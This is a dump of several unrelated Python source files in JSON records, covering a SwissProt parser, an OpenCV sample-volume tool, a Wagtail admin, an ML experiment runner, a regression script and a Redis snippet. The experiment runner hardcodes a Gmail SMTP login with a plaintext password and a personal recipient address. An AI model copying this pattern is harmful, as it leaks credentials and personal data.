"pickle.load", "line_number": 179, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 196, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 202, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 246, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 249, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 251, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 254, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 267, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 268, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 284, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 296, "usage_type": "call"}]} +{"seq_id": "141366734", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nIMPORTANT!:\nBefore writing an email asking questions such as\n'What does this input has to be like?' or\n'What return value do you expect?' 
PLEASE read our\nexercise sheet and the information in this template\ncarefully.\nIf something is still unclear, PLEASE talk to your\ncolleagues before writing an email!\n\nIf you experience technical issues or if you find a\nbug we are happy to answer your questions. However,\nin order to provide quick help in such cases we need\nto avoid unnecessary emails such as the examples\nshown above.\n\"\"\"\n\nfrom Bio import SeqIO # Tip: This module might be useful for parsing...\n\n############ Exercise 3: SwissProt ##########\nclass SwissProt_Parser:\n\n    PARSER = SeqIO\n\n    def __init__( self, path, frmt='uniprot-xml' ):\n        '''\n        Initialize every SwissProt_Parser with a path to an XML-formatted UniProt file.\n        An example file is included in the repository (P09616.xml).\n        Tip: Store the parsed XML entry in an object variable instead of parsing it\n        again & again ...\n        '''\n\n        self.sp_id = None\n        self.sp_name = None\n        self.sp_sequence_length = None\n        self.sp_organism = None\n        self.sp_subcellularlocation_location = None\n        self.sp_pdb_support = []\n\n        self.sp_anno = SeqIO.parse(path, frmt) # Parse the XML file once and re-use it in the functions below\n        for s in self.sp_anno:\n            #print(s)\n\n            self.sp_id = s.id\n            self.sp_name = s.name\n            self.sp_sequence_length = len(s.seq)\n            self.sp_organism = s.annotations['organism']\n            self.sp_subcellularlocation_location = s.annotations['comment_subcellularlocation_location']\n            dbxrefs = s.dbxrefs\n            for dbxref in dbxrefs:\n                if 'PDB:' in dbxref:\n                    self.sp_pdb_support.append(dbxref[4:])\n\n\n\n    # 3.2 SwissProt Identifiers\n    def get_sp_identifier( self ):\n        '''\n        Input: \n            self: Use XML entry which has been parsed & saved during object initialization \n        Return:\n            Unique SwissProt identifier for the given xml file\n        '''\n        \n        identifier = self.sp_id\n        return identifier\n\n    def get_sp_name(self):\n        identifier = self.sp_name\n        return identifier\n    \n    # 3.3 SwissProt Sequence length\n    def get_sp_sequence_length( self ):\n        '''\n        Input: \n            self: Use XML entry which has been parsed & saved during object initialization \n        Return:\n            Return sequence length of the UniProt entry as an integer.\n        '''\n        \n        seq_len = self.sp_sequence_length\n        return seq_len\n    \n    # 3.4 Organism \n    def get_organism( self ):\n        '''\n        Input: \n            self: Use XML entry which has been parsed & saved during object initialization \n        Return:\n            Return the name of the organism as stated in the corresponding field\n            of the XML data. Return value has to be a string.\n        '''\n        \n        organism = self.sp_organism\n        return organism\n    \n    # 3.5 Localizations\n    def get_localization( self ):\n        '''\n        Input: \n            self: Use XML entry which has been parsed & saved during object initialization \n        Return:\n            Return the name of the subcellular localization as stated in the \n            corresponding field.\n            Return value has to be a list of strings.\n        '''\n        \n        localization = self.sp_subcellularlocation_location\n        return localization\n    \n    # 3.6 Cross-references to PDB\n    def get_pdb_support( self ):\n        '''\n        Input: \n            self: Use XML entry which has been parsed & saved during object initialization \n        Return:\n            Returns a list of all PDB IDs which support the annotation of the\n            given SwissProt XML file. 
Return the PDB IDs as list.\n '''\n \n pdb_ids = self.sp_pdb_support\n return pdb_ids\n \ndef main():\n print('SwissProt XML Parser class')\n parser = SwissProt_Parser('./tests/P09616.xml')\n print(\"id: {0}, name: {1}, length: {2}, organism: {3}, locations: {4}, dbxrefs: {5}\".format(parser.get_sp_identifier(), parser.get_sp_name(), parser.get_sp_sequence_length(), parser.get_organism(), parser.get_localization(), parser.get_pdb_support()))\n return None\n \nif __name__ == '__main__':\n main()\n", "sub_path": "codechecker/repos/2/collected_files/exe2_swissprot/ga56jat.py", "file_name": "ga56jat.py", "file_ext": "py", "file_size_in_byte": 4552, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "Bio.SeqIO", "line_number": 24, "usage_type": "name"}, {"api_name": "Bio.SeqIO.parse", "line_number": 41, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "57606982", "text": "#!/usr/bin/env python27\n\"\"\"\nTested with python 2.7.9\n\"\"\"\n\nimport numpy as np\nimport argparse\nimport cv2\n\n\nclass Sample:\n\n \"\"\"\n Sample class used to parse image of sample located by RPiBoard class\n \"\"\"\n def __init__(self, image):\n # load the image\n # initialize variables so assertions don't throw exceptions\n self.image = cv2.imread(image)\n self.coord = []\n self.shaped_image = []\n\n def ToTuple(self, coord):\n \"\"\"\n To find the upper left and bottom right corner of the rectangle to be\n drawn around the found sample, a tuple of the x,y coordinates needs to\n be given from the given coord array.\n \"\"\"\n try:\n return tuple(self.ToTuple(i) for i in coord)\n except TypeError:\n return coord\n\n def findVolume(self):\n \"\"\"\n Finds the volume by filtering the imported image for a range of reds,\n masking the original image, finding the difference between the top and\n bottom of the red found in the image, and multiplies the pixel\n difference by a constant found through testing to match the z height to\n volume of sample\n \"\"\"\n # resize the image to something more managable\n small_image = cv2.resize(self.image, (0, 0), fx=0.5, fy=0.5)\n\n # cropping the image to ensure that the mask is correctly identifying\n # the blood vial\n cropped_image = small_image[200:500, 25:800]\n\n # rotate the cropped image\n self.shaped_image = cv2.transpose(cropped_image)\n self.shaped_image = cv2.flip(self.shaped_image, 0)\n\n # define the pixel boundaries defining \"red\" in the image\n lower = np.array([10, 10, 50], dtype=\"uint8\")\n upper = np.array([50, 50, 255], dtype=\"uint8\")\n\n # find the colors within the specified boundaries and apply\n # the mask\n mask = cv2.inRange(self.shaped_image, lower, upper)\n self.coord = cv2.findNonZero(mask)\n\n try:\n # setting up values for drawing rectangle over sample tube\n upper_left_corner = self.ToTuple(self.coord[0][0])\n\n # need to double value of lower right hand corner as the last value\n # is located at the vertex of the concave sample tube\n lower_right_corner = self.ToTuple(self.coord[-1][0])\n lower_right_corner = (int(lower_right_corner[0] * 1.75),\n lower_right_corner[1])\n\n self.volume = (lower_right_corner[1] - upper_left_corner[1])*0.0078\n except TypeError as e:\n print(\"Image given did not have a sample detected in the cropped\" +\n \" image. 
Ensure that a sample is in the holder, the \" +\n \"light stack is functioning properly, and retry.\")\n self.volume = 0.0\n except Exception as e:\n print(\"Error occured trying to find sample volume. See below for\" +\n \" details.\\n======================\\n\" + str(e))\n self.volume = 0.0\n\n def showVolumeImage(self, see_image):\n \"\"\"\n Presents the final image of the found sample area to the user.\n Rectangle drawn is multiplied by 1.75 as the final coordinate given by\n the red mask is at the vertex of the sample vial, rather than the\n opposite side of the starting coordinate\n \"\"\"\n # check to make sure that the volume was found first\n # if not, go ahead and run the findVolume(self) method\n if self.coord == []:\n self.findVolume()\n # setting up values for drawing rectangle over sample tube\n upper_left_corner = self.ToTuple(self.coord[0][0])\n\n # need to double value of lower right hand corner as the last value\n # is located at the vertex of the concave sample tube\n lower_right_corner = self.ToTuple(self.coord[-1][0])\n lower_right_corner = (int(lower_right_corner[0] * 1.75),\n lower_right_corner[1])\n\n # add the rectangle to the shaped image\n cv2.rectangle(self.shaped_image, upper_left_corner,\n lower_right_corner, [255, 0, 0], 2)\n\n # add the volume test to the upper left hand corner of the shaped image\n cv2.putText(self.shaped_image, \"%.1f\" % round(self.volume, 1),\n (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2)\n\n if see_image:\n # show the images\n cv2.imshow(\"images\", self.shaped_image)\n cv2.waitKey()\n\n\nif __name__ == \"__main__\":\n # construct the argument parse and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--image\", help=\"path to the image\")\n args = vars(ap.parse_args())\n # main(args[\"image\"])\n sample = Sample(args[\"image\"])\n sample.findVolume()\n sample.showVolumeImage()\n", "sub_path": "Sample.py", "file_name": "Sample.py", "file_ext": "py", "file_size_in_byte": 4879, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.transpose", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.flip", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.findNonZero", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 109, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 113, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 114, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "195036995", "text": "from wagtail.contrib.modeladmin.options import(\n\n ModelAdmin,\n modeladmin_register,\n ModelAdminGroup,\n)\nfrom .models import Menu\nfrom django.contrib import admin\n\n\n\n\n\nclass MenusAdmin(ModelAdmin):\n model=Menu\n menu_label='Menus'\n menu_icon=\"placeholder\"\n menu_order=1\n add_to_settings_menu=False\n exclude_from_explorer=False\n list_display=(\"title\",\"slug\")\n 
search_fields=(\"title\",\"slug\")\n\nmodeladmin_register(MenusAdmin)\n\n", "sub_path": "menus/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 455, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wagtail.contrib.modeladmin.options.ModelAdmin", "line_number": 14, "usage_type": "name"}, {"api_name": "models.Menu", "line_number": 15, "usage_type": "name"}, {"api_name": "wagtail.contrib.modeladmin.options.modeladmin_register", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "292446674", "text": "import email\nimport smtplib\nimport time\nimport traceback\nimport sys\nimport argparse\n\nimport utilitary.config as config\nfrom utilitary.random_search import RandomSearch\nfrom parsers.Syntax import SyntaxReader\n\nclass Experiment():\n def __init__(self, exp_path, email, notif_all=False):\n print(\"init Experiment --> start\")\n self.exp_path = exp_path\n self.email = email\n self.notif_all = notif_all\n # Check the extension\n extension = self.exp_path.split(\".\")\n if(extension[-1] != \"exp\"):\n exception = \"The extension of the file must be '.exp'\"\n exception += \" and not '.\" + extension[-1] + \"'\"\n if self.notif_all:\n self.mail(\"Init fail\", exception)\n raise Exception(exception)\n\n # Parse the file\n self.parser = SyntaxReader(self.exp_path)\n self.parser.parse()\n\n # Get all experience.\n self.list_experience = self.parser.get_list_experience()\n for i, exp in enumerate(self.list_experience):\n self.__check_experiment(i, exp)\n self.__check_import(exp)\n # print(self.parser.list_experience)\n print(\"init Experiment --> end\")\n\n def start(self):\n for i, exp in enumerate(self.list_experience):\n print(exp[\"random_search\"])\n self.experiment_name = exp[\"name\"]\n self.loader = config.loader[exp[\"loader_name\"]]\n self.model = config.model[exp[\"model_name\"]]\n\n random_search_dict = exp[\"random_search\"]\n if random_search_dict[\"state\"]:\n self.random_search(i, exp, random_search_dict)\n else:\n self.one_experiment(i, exp)\n\n def random_search(self, i, exp, random_search_dict):\n del random_search_dict[\"state\"]\n model_number = random_search_dict[\"model_number\"]\n print(model_number)\n del random_search_dict[\"model_number\"]\n random_search_object = RandomSearch(**random_search_dict)\n for mn in range(model_number):\n parameter = random_search_object.get_parameter()\n print(\"====================================\")\n print(\"Set of random parameter\", parameter)\n print(\"====================================\")\n\n loader_parameter = exp[\"loader_parameter\"]\n dataset = self.loader(**loader_parameter)\n\n model_parameter = dict()\n # Maybe not vary all the parameters so put the defined value\n NN_randomize = parameter[\"NN_randomize\"]\n lin_output_size, lin_activation = NN_randomize\n model_parameter = exp[\"model_parameter\"]\n model_parameter[\"dataset\"] = dataset\n model_parameter[\"suffix\"] = dataset.suffix\n model_parameter[\"ES\"] = exp[\"early_stopping\"]\n model_parameter[\"num_layers\"] = parameter[\"num_layers\"]\n model_parameter[\"hidden_size\"] = parameter[\"hidden_size\"]\n model_parameter[\"lin_output_size\"] = lin_output_size\n model_parameter[\"lin_activation\"] = lin_activation\n # model_parameter[\"batch_size\"] = parameter[\"batch_size\"]\n\n model = self.model(**model_parameter)\n\n train_parameter = dict()\n train_parameter[\"optimizer\"] = exp[\"optimizer\"]\n train_parameter[\"lr\"] = parameter[\"lr\"]\n 
train_parameter[\"error\"] = exp[\"loss\"]\n train_parameter[\"epoch\"] = exp[\"epoch\"]\n\n model.set_train_parameter(**train_parameter)\n\n print(\"Training Experiment \"+str(i)+\"random number \"+str(mn)+\" \"+self.experiment_name+\" -> Start\")\n # 0.001\n model.train()\n print(\"Training Experiment \"+str(i)+\" \"+self.experiment_name+\" -> End\")\n\n print(\"before plot_losses\")\n model.plot_losses()\n print(\"after plot_losses\")\n # No need of exp[\"output_name\"] for now\n # But can be useful for improvement\n test_parameter = exp[\"output_parameter\"]\n result = model.test(**test_parameter)\n self.write_message(result, i, exp, train_parameter,\n model_parameter, model)\n\n\n def one_experiment(self, i, exp):\n loader_parameter = exp[\"loader_parameter\"]\n dataset = self.loader(**loader_parameter)\n\n model_parameter = exp[\"model_parameter\"]\n model_parameter[\"dataset\"] = dataset\n model_parameter[\"suffix\"] = dataset.suffix\n model_parameter[\"ES\"] = exp[\"early_stopping\"]\n # print(\"exp one_experiment func ES\", model_parameter[\"ES\"])\n\n model = self.model(**model_parameter)\n\n train_parameter = dict()\n train_parameter[\"optimizer\"] = exp[\"optimizer\"]\n train_parameter[\"lr\"] = exp[\"learning_rate\"]\n train_parameter[\"error\"] = exp[\"loss\"]\n train_parameter[\"epoch\"] = exp[\"epoch\"]\n\n model.set_train_parameter(**train_parameter)\n\n print(\"Training Experiment \"+str(i)+\" \"+self.experiment_name+\" -> Start\")\n # 0.001\n model.train()\n print(\"Training Experiment \"+str(i)+\" \"+self.experiment_name+\" -> End\")\n\n print(\"before plot_losses\")\n model.plot_losses()\n print(\"after plot_losses\")\n # No need of exp[\"output_name\"] for now\n # But can be useful for improvement\n test_parameter = exp[\"output_parameter\"]\n result = model.test(**test_parameter)\n self.write_message(result, i, exp, train_parameter,\n model_parameter, model)\n\n def write_message(self, result, i, exp, train_parameter,\n model_parameter, model):\n subject = \"Experiment \"+str(i)+\": END\"\n if result is None:\n result = \"\"\n message = self.experiment_name+\"\\n\"\n message += \"path to the result: \"+model.path_weights+\"\\n\"\n # message += \"\\t\\t\"+model.path_weights_ES+\"\\n\"\n message += \"model: \"+exp[\"model_name\"]+\"\\n\"\n message += \"model parameters: \"+str(model_parameter)+\"\\n\"\n message += \"seed: \"+str(model.data.seed)+\"\\n\"\n message += \"optimizer: \"+train_parameter[\"optimizer\"]+\"\\n\"\n message += \"learning_rate: \"+str(train_parameter[\"lr\"])+\"\\n\"\n message += \"error: \"+train_parameter[\"error\"]+\"\\n\"\n message += \"epoch: \"+str(train_parameter[\"epoch\"])+\"\\n\\n\\n\"\n message += result\n print(\"Experiment, model_parameter: \", exp[\"model_parameter\"])\n self.mail(subject, message)\n\n\n def __check_import(self, dict_experiment):\n error_message = \"ERROR EXPERIMENT: \"\n if(dict_experiment[\"model_name\"] not in config.model):\n error_message += \"The model '\"+dict_experiment[\"model_name\"]+\"'\"\n error_message += \" is not imported in 'config.py'.\\nYou must\"\n error_message += \" import it\"\n if self.notif_all:\n self.mail(\"[Fail] Import Model\", error_message)\n raise Exception(error_message)\n if(dict_experiment[\"loader_name\"] not in config.loader):\n error_message += \"The loader '\"+dict_experiment[\"loader_name\"]+\"'\"\n error_message += \" is not imported in 'config.py'.\\nYou must\"\n error_message += \" import it\"\n if self.notif_all:\n self.mail(\"[Fail] Import Loader\", error_message)\n raise 
Exception(error_message)\n\n def __check_experiment(self, num_experiment, dict_experiment):\n error_message = \"ERROR EXPERIMENT: \"\n if(\"model_name\" not in dict_experiment):\n error_message += \"You must precise a model name in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (model_name)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"model_parameter\" not in dict_experiment):\n error_message += \"You must precise model parameters in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (model_parameter)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"loader_name\" not in dict_experiment):\n error_message += \"You must precise a loader name in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (loader_name)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"loader_parameter\" not in dict_experiment):\n error_message += \"You must precise loader parameters in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (loader_parameter)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n if(\"loss\" not in dict_experiment):\n error_message += \"You must precise a loss function in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (loss)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n # if(\"input\" not in dict_experiment):\n # error_message += \"You must precise an input path in experiment \"\n # error_message += str(num_experiment+1)\n # raise(Exception(error_message))\n if(\"optimizer\" not in dict_experiment):\n error_message += \"You must precise an optimizer in experiment \"\n error_message += str(num_experiment+1)\n if self.notif_all:\n subject = \"[Fail] Experiment \"+str(num_experiment+1)\n subject += \" (optimizer)\"\n self.mail(subject, error_message)\n raise(Exception(error_message))\n\n def __key_format(self, key):\n if(key == \"model_name\"):\n return \"Model: \"\n if(key == \"loader_name\"):\n return \"Loader: \"\n if(key == \"dataset_split\"):\n return \"Dataset split: \"\n if(key == \"loss\"):\n return \"Loss: \"\n if(key == \"learning_rate\"):\n return \"Learning rate: \"\n if(key == \"input\"):\n return \"Input: \"\n if(key == \"output\"):\n return \"Output: \"\n if(key == \"early_stopping\"):\n return \"Early stopping: \"\n if(key == \"cross_validation\"):\n return \"Cross validation: \"\n if(key == \"epoch\"):\n return \"Epoch: \"\n if(key == \"model_parameter\"):\n return \"Model parameters: \"\n if(key == \"loader_parameter\"):\n return \"Loader parameters: \"\n if(key == \"optimizer\"):\n return \"Optimizer: \"\n raise(Exception(\"ERROR DISPLAY: Format of key '\"+key+\"' not define\"))\n\n def __str__(self):\n string = \"\"\n for i, exp in enumerate(self.list_experience):\n string += \"Experience \" + str(i+1) + \"\\n\"\n for key in exp:\n string += \"\\t\"+ self.__key_format(key) + str(exp[key]) + \"\\n\"\n\n return string\n\n def mail(self, subject, message):\n try:\n msg = email.message_from_string(message)\n msg['From'] = \"cluster.sna@gmail.com\"\n 
msg['To'] = self.email\n msg['Subject'] = subject\n\n s = smtplib.SMTP('smtp.gmail.com',587)\n # Identify yourself to an ESMTP server using EHLO.\n s.ehlo()\n # Put the SMTP connection in TLS (Transport Layer Security) mode.\n s.starttls()\n\n # If send a traceback \"\\u0301\" may occur. We must remove it\n # because we must have only ascii character\n msg = msg.as_string()\n msg = msg.replace(\"\\u0301\", \"'\")\n s.login('cluster.sna@gmail.com', '----ecg19')\n s.sendmail('cluster.sna@gmail.com', self.email, msg)\n s.quit()\n except:\n print(\"Can not send the mail\")\n print(traceback.format_exc())\n\nif __name__ == \"__main__\":\n try:\n # Parse argument\n parser = argparse.ArgumentParser(description='Process Experiment')\n parser.add_argument('name_file', metavar='name_file', type=str,\n help='Name of the file where your experiment is describe')\n args = parser.parse_args()\n name_file = args.name_file\n\n start = None\n exp = Experiment(name_file, 'eric.guillaume.vidot@hotmail.fr')\n start = time.time()\n exp.start()\n end = time.time()\n duration = end - start\n duration = time.gmtime(duration)\n subject = \"END COMPUTATION\"\n message = str(duration.tm_hour)+\" hour \"+str(duration.tm_min)+\" min \"\n message += str(duration.tm_sec)+\" sec.\"\n exp.mail(subject, message)\n except:\n subject = \"FAIL EXPERIMENT\"\n if start is not None:\n end = time.time()\n duration = end - start\n duration = time.gmtime(duration)\n\n message = str(duration.tm_hour)+\" hour \"+str(duration.tm_min)+\" min \"\n message += str(duration.tm_sec)+\" sec.\\n\\n\\n\"\n message += traceback.format_exc()\n exp.mail(subject, message)\n raise\n # print(exp)\n", "sub_path": "Experiment.py", "file_name": "Experiment.py", "file_ext": "py", "file_size_in_byte": 13628, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "parsers.Syntax.SyntaxReader", "line_number": 28, "usage_type": "call"}, {"api_name": "utilitary.config.loader", "line_number": 43, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 43, "usage_type": "name"}, {"api_name": "utilitary.config.model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 44, "usage_type": "name"}, {"api_name": "utilitary.random_search.RandomSearch", "line_number": 57, "usage_type": "call"}, {"api_name": "utilitary.config.model", "line_number": 164, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 164, "usage_type": "name"}, {"api_name": "utilitary.config.loader", "line_number": 171, "usage_type": "attribute"}, {"api_name": "utilitary.config", "line_number": 171, "usage_type": "name"}, {"api_name": "email.message_from_string", "line_number": 274, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 279, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 294, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 299, "usage_type": "call"}, {"api_name": "time.time", "line_number": 307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 309, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 311, "usage_type": "call"}, {"api_name": "time.time", "line_number": 319, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 321, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 325, "usage_type": "call"}]} +{"seq_id": "557612748", "text": "import logging\nimport json\nimport time\n\nlogger = 
logging.getLogger(__name__)\n\nfrom experiment_file import ExperimentFile\n\n\nclass MeasurementsPlayer(object):\n\n def __init__(self, data_file, callback):\n self.data_file = data_file\n self.callback = callback\n self.experiment_file = ExperimentFile(self.data_file)\n\n def play(self):\n playback_start = int(time.time())\n measurement_start = None\n\n logger.info('Start replaying file')\n nb_messages = 0\n for measurement in self.experiment_file.open_for_reading():\n if not measurement_start:\n measurement_start = measurement['created_at']\n\n logger.info('Sending a message %s' % measurement['sensor_id'])\n nb_messages += 1\n playback_delta = int(time.time()) - playback_start\n measurement_delta = measurement['created_at'] - measurement_start\n\n if playback_delta < measurement_delta:\n # Sleep in order to wait for the correct time to play\n # back this measurement.\n logger.info('sleeping %d' % (measurement_delta - playback_delta))\n time.sleep((measurement_delta - playback_delta) / 1000000.0)\n \"\"\"\n else:\n # Skip this measurement because we're behind\n continue\n \"\"\"\n\n self.callback(json.dumps(measurement))\n\n logger.info('Done replaying file with %s messages', nb_messages)\n\n self.experiment_file.close()\n\n", "sub_path": "core/measurements_player.py", "file_name": "measurements_player.py", "file_ext": "py", "file_size_in_byte": 1539, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "experiment_file.ExperimentFile", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "time.time", "line_number": 29, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "180420761", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndf = pd.read_csv('salary.csv', na_values = ['',' '])\nX = df['workedYears'].values.reshape(-1,1)\ny = df['salaryBrutto'].values.reshape(-1,1)\ndf.fillna(0, inplace=True)\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state=0)\nX_train = X[:47]\nX_test = X[47:]\ny_train = y[:47]\ny_test = y[47:59]\n\nfrom sklearn.linear_model import LinearRegression\nlm = LinearRegression()\nlm.fit(X_train, y_train)\nlm.predict(X_test)\n\npredicted_salary = lm.predict(X_test)\nlistsalary = predicted_salary.round(2).tolist()\nyears_to_predict = X_test.tolist()\n\nfor i in range(len(listsalary)):\n print(\"For %s years of experience, predicted salary will be %s.\" % (*years_to_predict[i], *listsalary[i]))\n\nplt.xlabel('Worked years')\nplt.ylabel('Predicted salary brutto')\nplt.plot(X_test, predicted_salary, marker=\"o\", markerfacecolor=\"red\")\nplt.show()", "sub_path": "Cognitive_Patronage2019_Task1.py", "file_name": "Cognitive_Patronage2019_Task1.py", "file_ext": "py", "file_size_in_byte": 982, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 
29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]} +{"seq_id": "356353998", "text": "import pandas\nimport numpy\nimport statsmodels.api as sm\n\ndef parse_data_set(filepath):\n df=pandas.read_excel(filepath)\n df['Lat']=df['Lat'].str.replace('(\\d+)w','-\\\\1',regex=True)\n df['Lat'] = df['Lat'].str.replace('(\\d+)e', '\\\\1', regex=True)\n df['Lat']=df['Lat'].astype(int)\n df['Lon']=df['Lon'].str.replace('(\\d+)s','-\\\\1',regex=True)\n df['Lon'] = df['Lon'].str.replace('(\\d+)n', '\\\\1', regex=True)\n df['Lon']=df['Lon'].astype(int)\n df['HHMMSS']=df['HHMMSS']//10000*3600+df['HHMMSS']%10000/100*60+df['HHMMSS']%10000%100\n df=df.drop(labels=['HHMMSS','Lat','Lon'],axis=1)\n # df = df.drop(labels=['HHMMSS', 'YYYYMMDD', 'Lat', 'Lon'], axis=1)\n return df\n\ndef looper(limit,data):\n cols = ['x1', 'x2', 'x3', 'x5', 'x6', 'x7', 'x8', 'x9','x10','x11']\n for i in range(len(cols)):\n data1 = data[cols]\n x = sm.add_constant(data1) #生成自变量\n y = data['WSPD'] #生成因变量\n model = sm.OLS(y, x) #生成模型\n result = model.fit() #模型拟合\n pvalues = result.pvalues #得到结果中所有P值\n pvalues.drop('const',inplace=True) #把const取得\n pmax = max(pvalues) #选出最大的P值\n if pmax>limit:\n ind = pvalues.idxmax() #找出最大P值的index\n cols.remove(ind) #把这个index从cols中删除\n else:\n return result\n\n\n\ndata=parse_data_set(filepath='H:/guan.多元回归/test.xlsx')\nprint(data)\ndata.columns=['WSPD','x1', 'x2', 'x3','x4' ,'x5', 'x6', 'x7', 'x8', 'x9','x10','x11']\n# x=numpy.array(data.iloc[:,1:])\n# x = sm.add_constant(x) #生成自变量\n# y = numpy.array(data['WSPD']) #生成因变量\n\nresult = looper(0.05,data)\n\nprint(result.summary()) #模型描述", "sub_path": "job-json,xml,csv/guan.多元回归/多元回归.py", "file_name": "多元回归.py", "file_ext": "py", "file_size_in_byte": 1728, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_excel", "line_number": 6, "usage_type": "call"}, {"api_name": "statsmodels.api.add_constant", "line_number": 22, "usage_type": "call"}, {"api_name": "statsmodels.api", "line_number": 22, "usage_type": "name"}, {"api_name": "statsmodels.api.OLS", "line_number": 24, "usage_type": "call"}, {"api_name": "statsmodels.api", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "340959711", "text": "import redis\nimport json \nimport time\nimport os\n\nrds = redis.from_url(os.environ.get(\"REDIS_URL\",\"redis://localhost:6379\"))\n\nkey = \"user:0:shedule\"\n\nshedule = rds.get(key)\nif type(shedule) is bytes: shedule = shedule.decode('utf-8')\nif shedule: shedule = json.loads(shedule)\nshedule = shedule or {}\n\n\ncur_date = time.strftime(\"%d.%m.%Y\")\ncur_time = time.localtime()\n\nflag = False\nfor i, event in 